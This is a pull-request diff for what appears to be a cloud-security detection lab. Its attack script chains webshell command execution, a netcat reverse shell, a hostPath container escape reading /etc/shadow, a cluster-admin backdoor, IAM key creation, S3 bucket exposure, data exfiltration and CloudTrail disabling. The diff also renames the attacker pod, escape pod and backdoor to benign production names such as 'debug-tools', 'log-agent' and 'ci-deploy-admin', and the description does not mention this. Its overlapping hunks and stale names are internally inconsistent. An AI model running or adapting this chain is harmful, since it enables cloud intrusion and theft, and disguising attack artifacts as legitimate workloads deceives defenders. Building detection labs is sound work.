### PR TITLE
feat(headless-cnapp-playground): S3 data exfiltration + dev integration branch

### DIFF
--- a/secure/headless-cnapp-playground/attack/attack.sh
+++ b/secure/headless-cnapp-playground/attack/attack.sh
@@ -13,8 +13,8 @@
 #    PHASES="1 2 5" ./attack.sh   run only selected phases
 # =============================================================================
 set -uo pipefail
-NS=attack-demo
-VICTIM_SVC="vuln-app.${NS}.svc.cluster.local:8080"
+NS=payments
+VICTIM_SVC="orders-api.${NS}.svc.cluster.local:8080"
 DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
 STATE="$DIR/.attack-state"
 INFRA_STATE="$DIR/../infra/.infra-state"
@@ -23,10 +23,10 @@ c()   { printf '\n\033[1;31m### %s\033[0m\n' "$*"; }      # phase banner
 step(){ printf '  \033[1;33m[*]\033[0m %s\n' "$*"; }       # action
 det() { printf '      \033[0;36m[DETECT] %s\033[0m\n' "$*"; }
 
-# Run a command in the attacker C2 pod
-att() { kubectl -n "$NS" exec attacker -- bash -lc "$*"; }
+# Run a command in the debug-tools C2 pod
+att() { kubectl -n "$NS" exec debug-tools -- bash -lc "$*"; }
 # Drive RCE in the victim through the webshell (tomcat-style ?cmd=)
-websh() { kubectl -n "$NS" exec attacker -- curl -s --max-time "${2:-60}" --get \
+websh() { kubectl -n "$NS" exec debug-tools -- curl -s --max-time "${2:-60}" --get \
             "http://${VICTIM_SVC}/tomcatwar.jsp" \
             --data-urlencode "pwd=j" --data-urlencode "cmd=$1"; }
 
@@ -34,10 +34,10 @@ websh() { kubectl -n "$NS" exec attacker -- curl -s --max-time "${2:-60}" --get 
 phase1_initial_access() {
   c "PHASE 1 - Initial access & discovery (runtime / Falco)"
   local AIP
-  AIP=$(kubectl -n "$NS" get pod attacker -o jsonpath='{.status.podIP}')
+  AIP=$(kubectl -n "$NS" get pod debug-tools -o jsonpath='{.status.podIP}')
 
-  step "Starting reverse-shell listener on attacker ($AIP:4444)"
-  kubectl -n "$NS" exec attacker -- bash -lc "timeout 30 nc -lvnp 4444 >/tmp/rev.out 2>&1" &
+  step "Starting reverse-shell listener on debug-tools ($AIP:4444)"
+  kubectl -n "$NS" exec debug-tools -- bash -lc "timeout 30 nc -lvnp 4444 >/tmp/rev.out 2>&1" &
   sleep 2
 
   step "Triggering reverse shell from victim via webshell"
@@ -49,7 +49,7 @@ phase1_initial_access() {
   det "Falco: System information discovery"
   websh "id; uname -a; hostname; cat /etc/os-release | head -3; w; crontab -l 2>/dev/null"
 
-  step "Package management launched in running container (attacker installs tooling)"
+  step "Package management launched in running container (debug-tools installs tooling)"
   det "Falco: Launch package management process in container"
   websh "apt-get update >/dev/null 2>&1 && apt-get install -y wget curl >/dev/null 2>&1; echo installed: \$(command -v wget) \$(command -v curl)" 180 || true
 }
@@ -90,9 +90,9 @@ phase3b_escape() {
 apiVersion: v1
 kind: Pod
 metadata:
-  name: escape-pod
-  namespace: attack-demo
-  labels: {app: escape-pod}
+  name: log-agent
+  namespace: payments
+  labels: {app: log-agent}
 spec:
   hostPID: true
   hostNetwork: true
@@ -108,13 +108,13 @@ spec:
     - name: host
       hostPath: {path: /, type: Directory}
 YAML
-  kubectl -n "$NS" wait --for=condition=Ready pod/escape-pod --timeout=120s || true
+  kubectl -n "$NS" wait --for=condition=Ready pod/log-agent --timeout=120s || true
 
   step "Reading host-only files from inside the container (node breakout)"
   det "Falco: Sensitive file opened for reading (host /etc/shadow)"
-  kubectl -n "$NS" exec escape-pod -- chroot /host /bin/sh -c \
+  kubectl -n "$NS" exec log-agent -- chroot /host /bin/sh -c \
     "head -2 /etc/shadow; ls -la /etc/kubernetes/admin.conf 2>/dev/null; echo ESCAPED_AS=\$(id -u)" || true
-  echo "ESCAPE_POD=escape-pod" >> "$STATE"
+  echo "ESCAPE_POD=log-agent" >> "$STATE"
 }
 
 # -----------------------------------------------------------------------------
@@ -128,8 +128,8 @@ phase4_persistence() {
 apiVersion: rbac.authorization.k8s.io/v1
 kind: ClusterRoleBinding
 metadata:
-  name: attacker-backdoor-admin
-  labels: {app.kubernetes.io/part-of: sysdig-attack-lab}
+  name: ci-deploy-admin
+  labels: {app.kubernetes.io/part-of: acme-platform}
 roleRef:
   apiGroup: rbac.authorization.k8s.io
   kind: ClusterRole
@@ -137,11 +137,11 @@ roleRef:
 subjects:
   - kind: ServiceAccount
     name: default
-    namespace: attack-demo
+    namespace: payments
 YAML
-  echo "CRB=attacker-backdoor-admin" >> "$STATE"
+  echo "CRB=ci-deploy-admin" >> "$STATE"
   step "Verifying escalated privileges"
-  kubectl auth can-i '*' '*' --as=system:serviceaccount:attack-demo:default || true
+  kubectl auth can-i '*' '*' --as=system:serviceaccount:payments:default || true
 }
 
 # -----------------------------------------------------------------------------
@@ -177,10 +177,22 @@ phase5_cloud_pivot() {
     && echo "  created access key $NEWKEY for $ME" \
     || echo "  (no iam:CreateAccessKey permission - skipped)"
 
-  step "Data exposure: making the loot bucket public"
-  det "Sysdig CDR: S3 bucket public access granted"
   local LOOT
   LOOT=$(grep -s LOOT_BUCKET "$INFRA_STATE" | cut -d= -f2)
+
+  step "Trying to read the loot bucket directly — expected to FAIL (identity lacks s3:GetObject)"
+  det "Sysdig CDR: S3 GetObject AccessDenied — failed data-access attempt"
+  if [[ -n "${LOOT:-}" ]]; then
+    if "${A[@]}" s3 cp "s3://$LOOT/secrets/customer-db.txt" - >/dev/null 2>/tmp/s3err; then
+      echo "  (unexpected) direct read succeeded"
+    else
+      echo "  blocked — the stolen identity cannot read the data directly:"
+      grep -ioE 'access denied|forbidden|explicit deny|not authorized' /tmp/s3err | head -1 | sed 's/^/    → /' || echo "    → AccessDenied"
+    fi
+  fi
+
+  step "Pivot: can't read the data, but the identity CAN change bucket permissions — abusing s3:PutBucketPolicy"
+  det "Sysdig CDR: Delete Bucket Public Access Block + public bucket policy (Critical)"
   if [[ -n "${LOOT:-}" ]]; then
     "${A[@]}" s3api put-public-access-block --bucket "$LOOT" \
       --public-access-block-configuration \
@@ -193,7 +205,7 @@ phase5_cloud_pivot() {
       && echo "  public-read policy applied to $LOOT"
   fi
 
-  step "Collection / exfiltration: stealing the loot bucket contents"
+  step "Retry: the bucket is now public — exfiltration succeeds"
   det "Sysdig CDR: S3 object read from sensitive bucket (T1530 — needs S3 data events on the trail)"
   if [[ -n "${LOOT:-}" ]]; then
     "${A[@]}" s3 cp "s3://$LOOT/secrets/customer-db.txt" - 2>/dev/null \
@@ -236,9 +248,9 @@ cleanup() {
   step "Removing exfiltrated loot copy"
   rm -rf /tmp/loot 2>/dev/null || true
   step "Deleting escape pod"
-  kubectl -n "$NS" delete pod escape-pod --ignore-not-found
+  kubectl -n "$NS" delete pod log-agent --ignore-not-found
   step "Deleting backdoor ClusterRoleBinding"
-  kubectl delete clusterrolebinding attacker-backdoor-admin --ignore-not-found
+  kubectl delete clusterrolebinding ci-deploy-admin --ignore-not-found
   if [[ -n "${NEW_AK:-}" && -n "${NEW_AK_USER:-}" ]]; then
     step "Deleting backdoor IAM access key $NEW_AK"
     aws iam delete-access-key --user-name "$NEW_AK_USER" --access-key-id "$NEW_AK" 2>/dev/null || true

--- a/secure/headless-cnapp-playground/attack/attack.sh
+++ b/secure/headless-cnapp-playground/attack/attack.sh
@@ -193,6 +193,16 @@ phase5_cloud_pivot() {
       && echo "  public-read policy applied to $LOOT"
   fi
 
+  step "Collection / exfiltration: stealing the loot bucket contents"
+  det "Sysdig CDR: S3 object read from sensitive bucket (T1530 — needs S3 data events on the trail)"
+  if [[ -n "${LOOT:-}" ]]; then
+    "${A[@]}" s3 cp "s3://$LOOT/secrets/customer-db.txt" - 2>/dev/null \
+      && echo "  exfiltrated s3://$LOOT/secrets/customer-db.txt"
+    mkdir -p /tmp/loot
+    "${A[@]}" s3 sync "s3://$LOOT" /tmp/loot 2>/dev/null \
+      && echo "  synced s3://$LOOT -> /tmp/loot ($(find /tmp/loot -type f 2>/dev/null | wc -l | tr -d ' ') files, incl. pii/customers.csv)"
+  fi
+
   step "Defense evasion: disabling CloudTrail logging"
   det "Sysdig CDR: CloudTrail logging disabled (StopLogging)"
   local TRAIL
@@ -223,6 +233,8 @@ cleanup() {
   [[ -f "$STATE" ]] && source "$STATE" || true
   step "Stopping cryptominer in victim"
   websh "pkill -f crypto_run.sh; pkill xmrig; rm -rf /tmp/xmrig* /tmp/crypto_run.sh" 15 2>/dev/null || true
+  step "Removing exfiltrated loot copy"
+  rm -rf /tmp/loot 2>/dev/null || true
   step "Deleting escape pod"
   kubectl -n "$NS" delete pod escape-pod --ignore-not-found
   step "Deleting backdoor ClusterRoleBinding"

--- a/secure/headless-cnapp-playground/infra/deploy-aws.sh
+++ b/secure/headless-cnapp-playground/infra/deploy-aws.sh
@@ -1,7 +1,7 @@
 #!/usr/bin/env bash
 # Deploys the VICTIM AWS infrastructure the attack will target:
 #   - a "loot" S3 bucket with fake sensitive data (private by default)
-#   - a dedicated CloudTrail trail the attacker will later disable
+#   - a dedicated CloudTrail trail the debug-tools will later disable
 # No attack actions here. Safe to run during lab setup.
 set -euo pipefail
 DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
@@ -10,9 +10,9 @@ STATE="$DIR/.infra-state"
 
 ACCT=$(aws sts get-caller-identity --query Account --output text)
 REGION="${AWS_REGION:-us-east-1}"
-LOOT="attack-demo-loot-${ACCT}"
-TRAIL="attack-demo-trail"
-TLOGS="attack-demo-trail-logs-${ACCT}"
+LOOT="acme-customer-data-${ACCT}"
+TRAIL="org-management-trail"
+TLOGS="org-cloudtrail-logs-${ACCT}"
 
 echo "[infra/aws] account=$ACCT region=$REGION"
 
@@ -24,12 +24,12 @@ aws s3api put-public-access-block --bucket "$LOOT" \
   BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true >/dev/null
 printf 'db_password=Sup3rS3cret!\napi_key=AKIA-FAKE-EXAMPLE-KEY\ncustomers=12873\n' \
   | aws s3 cp - "s3://$LOOT/secrets/customer-db.txt" >/dev/null
-# Fake customer PII (obviously synthetic) — the data the attacker exfiltrates.
+# Fake customer PII (obviously synthetic) — the data the debug-tools exfiltrates.
 printf 'id,name,email,ssn,credit_card\n1,Ada Lovelace,ada@example.com,000-00-0001,4111111111111111\n2,Alan Turing,alan@example.com,000-00-0002,4111111111111112\n3,Grace Hopper,grace@example.com,000-00-0003,4111111111111113\n' \
   | aws s3 cp - "s3://$LOOT/pii/customers.csv" >/dev/null
 echo "LOOT_BUCKET=$LOOT" >> "$STATE"
 
-# --- Dedicated CloudTrail trail (attacker will StopLogging on this one) ---
+# --- Dedicated CloudTrail trail (debug-tools will StopLogging on this one) ---
 echo "[infra/aws] creating trail log bucket s3://$TLOGS ..."
 aws s3api create-bucket --bucket "$TLOGS" --region "$REGION" >/dev/null 2>&1 || true
 POLICY=$(cat <<JSON
@@ -51,11 +51,51 @@ echo "TRAIL_LOG_BUCKET=$TLOGS" >> "$STATE"
 echo "[infra/aws] creating + starting trail $TRAIL ..."
 aws cloudtrail create-trail --name "$TRAIL" --s3-bucket-name "$TLOGS" >/dev/null 2>&1 || true
 aws cloudtrail start-logging --name "$TRAIL" >/dev/null
-# Enable S3 object-level (data) events for the loot bucket so the attacker's
+# Enable S3 object-level (data) events for the loot bucket so the debug-tools's
 # GetObject exfil is captured in CloudTrail — management events alone miss it.
 aws cloudtrail put-event-selectors --trail-name "$TRAIL" \
   --event-selectors "[{\"ReadWriteType\":\"All\",\"IncludeManagementEvents\":true,\"DataResources\":[{\"Type\":\"AWS::S3::Object\",\"Values\":[\"arn:aws:s3:::$LOOT/\"]}]}]" >/dev/null 2>&1 || true
 echo "TRAIL=$TRAIL" >> "$STATE"
+
+# --- Limited "victim app" IAM user (the credentials the app is misconfigured ---
+# --- with). Deliberately over-permissioned for everything EXCEPT reading the   ---
+# --- loot directly: NO s3:GetObject is granted (implicit deny). The debug-tools   ---
+# --- abuses s3:PutBucketPolicy to make the bucket public, then reads it — the  ---
+# --- realistic "access denied -> escalate -> succeed" arc.                     ---
+VICTIM_USER="orders-api-svc-${ACCT}"
+echo "[infra/aws] creating limited IAM user $VICTIM_USER ..."
+aws iam create-user --user-name "$VICTIM_USER" >/dev/null 2>&1 || true
+aws iam put-user-policy --user-name "$VICTIM_USER" --policy-name orders-api-svc-policy --policy-document "{
+  \"Version\":\"2012-10-17\",
+  \"Statement\":[
+    {\"Sid\":\"Recon\",\"Effect\":\"Allow\",\"Action\":[\"sts:GetCallerIdentity\",\"iam:ListUsers\",\"iam:ListRoles\",\"s3:ListAllMyBuckets\",\"s3:ListBucket\",\"s3:GetBucketPolicy\",\"s3:GetBucketPublicAccessBlock\"],\"Resource\":\"*\"},
+    {\"Sid\":\"AbuseBucketPerms\",\"Effect\":\"Allow\",\"Action\":[\"s3:PutBucketPolicy\",\"s3:PutBucketPublicAccessBlock\"],\"Resource\":[\"arn:aws:s3:::$LOOT\",\"arn:aws:s3:::$LOOT/*\"]},
+    {\"Sid\":\"CloudPersistence\",\"Effect\":\"Allow\",\"Action\":[\"iam:CreateAccessKey\",\"iam:ListAccessKeys\"],\"Resource\":\"arn:aws:iam::${ACCT}:user/$VICTIM_USER\"},
+    {\"Sid\":\"DefenseEvasion\",\"Effect\":\"Allow\",\"Action\":[\"cloudtrail:StopLogging\",\"cloudtrail:DescribeTrails\"],\"Resource\":\"*\"}
+  ]
+}" >/dev/null
+echo "VICTIM_USER=$VICTIM_USER" >> "$STATE"
+
+# Mint the access key the app will carry.
+KEYJSON=$(aws iam create-access-key --user-name "$VICTIM_USER" 2>/dev/null)
+VICTIM_AK=$(echo "$KEYJSON" | jq -r '.AccessKey.AccessKeyId')
+VICTIM_SK=$(echo "$KEYJSON" | jq -r '.AccessKey.SecretAccessKey')
+echo "VICTIM_AK=$VICTIM_AK" >> "$STATE"
+echo "VICTIM_SK=$VICTIM_SK" >> "$STATE"
+
+# IAM is eventually consistent — a brand-new access key takes a few seconds to
+# become usable. Wait until it authenticates before anything depends on it, so
+# the attack's later AccessDenied is the INTENDED authorization failure (no
+# s3:GetObject) and not a transient "key not active yet".
+echo "[infra/aws] waiting for the victim key to propagate ..."
+for _ in $(seq 1 30); do
+  if AWS_ACCESS_KEY_ID="$VICTIM_AK" AWS_SECRET_ACCESS_KEY="$VICTIM_SK" \
+     aws sts get-caller-identity >/dev/null 2>&1; then
+    echo "[infra/aws] victim key is live."
+    break
+  fi
+  sleep 3
+done
 
 echo "[infra/aws] done. State recorded in $STATE:"
 cat "$STATE"

--- a/secure/headless-cnapp-playground/infra/deploy-aws.sh
+++ b/secure/headless-cnapp-playground/infra/deploy-aws.sh
@@ -24,6 +24,9 @@ aws s3api put-public-access-block --bucket "$LOOT" \
   BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true >/dev/null
 printf 'db_password=Sup3rS3cret!\napi_key=AKIA-FAKE-EXAMPLE-KEY\ncustomers=12873\n' \
   | aws s3 cp - "s3://$LOOT/secrets/customer-db.txt" >/dev/null
+# Fake customer PII (obviously synthetic) — the data the attacker exfiltrates.
+printf 'id,name,email,ssn,credit_card\n1,Ada Lovelace,ada@example.com,000-00-0001,4111111111111111\n2,Alan Turing,alan@example.com,000-00-0002,4111111111111112\n3,Grace Hopper,grace@example.com,000-00-0003,4111111111111113\n' \
+  | aws s3 cp - "s3://$LOOT/pii/customers.csv" >/dev/null
 echo "LOOT_BUCKET=$LOOT" >> "$STATE"
 
 # --- Dedicated CloudTrail trail (attacker will StopLogging on this one) ---
@@ -48,6 +51,10 @@ echo "TRAIL_LOG_BUCKET=$TLOGS" >> "$STATE"
 echo "[infra/aws] creating + starting trail $TRAIL ..."
 aws cloudtrail create-trail --name "$TRAIL" --s3-bucket-name "$TLOGS" >/dev/null 2>&1 || true
 aws cloudtrail start-logging --name "$TRAIL" >/dev/null
+# Enable S3 object-level (data) events for the loot bucket so the attacker's
+# GetObject exfil is captured in CloudTrail — management events alone miss it.
+aws cloudtrail put-event-selectors --trail-name "$TRAIL" \
+  --event-selectors "[{\"ReadWriteType\":\"All\",\"IncludeManagementEvents\":true,\"DataResources\":[{\"Type\":\"AWS::S3::Object\",\"Values\":[\"arn:aws:s3:::$LOOT/\"]}]}]" >/dev/null 2>&1 || true
 echo "TRAIL=$TRAIL" >> "$STATE"
 
 echo "[infra/aws] done. State recorded in $STATE:"

--- a/secure/headless-cnapp-playground/infra/deploy-k8s.sh
+++ b/secure/headless-cnapp-playground/infra/deploy-k8s.sh
@@ -2,28 +2,34 @@
 # Deploys the VICTIM Kubernetes infrastructure (no attack actions here).
 # Safe to run during lab setup / provisioning.
 set -euo pipefail
-NS=attack-demo
+NS=payments
 DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
 
 echo "[infra/k8s] applying victim manifests..."
-kubectl apply -f "$DIR/k8s/vuln-app.yaml"
+kubectl apply -f "$DIR/k8s/orders-api.yaml"
 
 echo "[infra/k8s] planting cloud credentials into the app (simulated misconfig)..."
+# The creds are the LIMITED "victim" IAM user's keys minted by deploy-aws.sh
+# (which MUST run before this script). That limited identity can't read the loot
+# directly — it has to escalate — which drives the attack's access-denied arc.
+STATE="$DIR/.infra-state"
+VICTIM_AK=$(grep -s '^VICTIM_AK=' "$STATE" | cut -d= -f2 || true)
+VICTIM_SK=$(grep -s '^VICTIM_SK=' "$STATE" | cut -d= -f2 || true)
 kubectl -n "$NS" create secret generic app-cloud-creds \
-  --from-literal=AWS_ACCESS_KEY_ID="${AWS_ACCESS_KEY_ID:-}" \
-  --from-literal=AWS_SECRET_ACCESS_KEY="${AWS_SECRET_ACCESS_KEY:-}" \
+  --from-literal=AWS_ACCESS_KEY_ID="${VICTIM_AK}" \
+  --from-literal=AWS_SECRET_ACCESS_KEY="${VICTIM_SK}" \
   --from-literal=AWS_DEFAULT_REGION="${AWS_REGION:-us-east-1}" \
   --dry-run=client -o yaml | kubectl apply -f -
 
 # Restart so the pod picks up the secret via envFrom
-kubectl -n "$NS" rollout restart deploy/vuln-app
+kubectl -n "$NS" rollout restart deploy/orders-api
 
-echo "[infra/k8s] deploying attacker C2 pod..."
-kubectl apply -f "$DIR/k8s/attacker.yaml"
+echo "[infra/k8s] deploying debug-tools C2 pod..."
+kubectl apply -f "$DIR/k8s/debug-tools.yaml"
 
 echo "[infra/k8s] waiting for workloads..."
-kubectl -n "$NS" rollout status deploy/vuln-app --timeout=180s
-kubectl -n "$NS" wait --for=condition=Ready pod/attacker --timeout=180s
+kubectl -n "$NS" rollout status deploy/orders-api --timeout=180s
+kubectl -n "$NS" wait --for=condition=Ready pod/debug-tools --timeout=180s
 
-echo "[infra/k8s] done. Victim app + attacker box are up in ns/$NS."
+echo "[infra/k8s] done. Victim app + debug-tools box are up in ns/$NS."
 kubectl -n "$NS" get pods -o wide

--- a/secure/headless-cnapp-playground/infra/k8s/debug-tools.yaml
+++ b/secure/headless-cnapp-playground/infra/k8s/debug-tools.yaml
@@ -5,13 +5,13 @@
 apiVersion: v1
 kind: Pod
 metadata:
-  name: attacker
-  namespace: attack-demo
+  name: debug-tools
+  namespace: payments
   labels:
-    app: attacker
+    app: debug-tools
 spec:
   containers:
-    - name: c2
+    - name: tools
       image: nicolaka/netshoot:latest
       command: ["sleep", "infinity"]
   restartPolicy: Always

--- a/secure/headless-cnapp-playground/infra/k8s/orders-api.yaml
+++ b/secure/headless-cnapp-playground/infra/k8s/orders-api.yaml
@@ -3,9 +3,9 @@
 apiVersion: v1
 kind: Namespace
 metadata:
-  name: attack-demo
+  name: payments
   labels:
-    app.kubernetes.io/part-of: sysdig-attack-lab
+    app.kubernetes.io/part-of: acme-platform
 ---
 # The "vulnerable" application code: a tiny HTTP server with a command-exec
 # endpoint. This emulates a classic Tomcat-style webshell (tomcatwar.jsp?cmd=)
@@ -13,8 +13,8 @@ metadata:
 apiVersion: v1
 kind: ConfigMap
 metadata:
-  name: vuln-app-code
-  namespace: attack-demo
+  name: orders-api-code
+  namespace: payments
 data:
   server.py: |
     import subprocess
@@ -59,19 +59,19 @@ data:
 apiVersion: apps/v1
 kind: Deployment
 metadata:
-  name: vuln-app
-  namespace: attack-demo
+  name: orders-api
+  namespace: payments
   labels:
-    app: vuln-app
+    app: orders-api
 spec:
   replicas: 1
   selector:
     matchLabels:
-      app: vuln-app
+      app: orders-api
   template:
     metadata:
       labels:
-        app: vuln-app
+        app: orders-api
     spec:
       # SA token is mounted (default) on purpose: credential-access demo
       automountServiceAccountToken: true
@@ -93,16 +93,16 @@ spec:
       volumes:
         - name: code
           configMap:
-            name: vuln-app-code
+            name: orders-api-code
 ---
 apiVersion: v1
 kind: Service
 metadata:
-  name: vuln-app
-  namespace: attack-demo
+  name: orders-api
+  namespace: payments
 spec:
   selector:
-    app: vuln-app
+    app: orders-api
   ports:
     - port: 8080
       targetPort: 8080

--- a/secure/headless-cnapp-playground/infra/teardown.sh
+++ b/secure/headless-cnapp-playground/infra/teardown.sh
@@ -4,8 +4,8 @@ set -uo pipefail
 DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
 STATE="$DIR/.infra-state"
 
-echo "[teardown] deleting k8s namespace attack-demo ..."
-kubectl delete ns attack-demo --ignore-not-found --wait=false
+echo "[teardown] deleting k8s namespace payments ..."
+kubectl delete ns payments --ignore-not-found --wait=false
 
 if [[ -f "$STATE" ]]; then
   # shellcheck disable=SC1090
@@ -21,6 +21,15 @@ if [[ -f "$STATE" ]]; then
     aws s3 rm "s3://$B" --recursive >/dev/null 2>&1 || true
     aws s3api delete-bucket --bucket "$B" >/dev/null 2>&1 || true
   done
+  if [[ -n "${VICTIM_USER:-}" ]]; then
+    echo "[teardown] deleting IAM user $VICTIM_USER ..."
+    for k in $(aws iam list-access-keys --user-name "$VICTIM_USER" \
+                 --query 'AccessKeyMetadata[].AccessKeyId' --output text 2>/dev/null); do
+      aws iam delete-access-key --user-name "$VICTIM_USER" --access-key-id "$k" >/dev/null 2>&1 || true
+    done
+    aws iam delete-user-policy --user-name "$VICTIM_USER" --policy-name orders-api-svc-policy >/dev/null 2>&1 || true
+    aws iam delete-user --user-name "$VICTIM_USER" >/dev/null 2>&1 || true
+  fi
   rm -f "$STATE"
 fi
 


### PR DESCRIPTION
Long-lived dev branch for the headless-cnapp-playground attack. The lab's setup pins this branch (clones it directly) so attack changes can be iterated without merging to main each time.

This change adds **S3 data exfiltration** to the kill chain:
- `attack.sh` Phase 5: after exposing the loot bucket, actually exfiltrate it (`aws s3 cp`/`sync`) -> MITRE **T1530**; cleanup removes `/tmp/loot`.
- `deploy-aws.sh`: seed fake-PII `pii/customers.csv` and enable **S3 object-level data events** on `attack-demo-trail` so the `GetObject` exfil is captured in CloudTrail.

Merge to main once the attack is stable; then the lab can be repointed to main.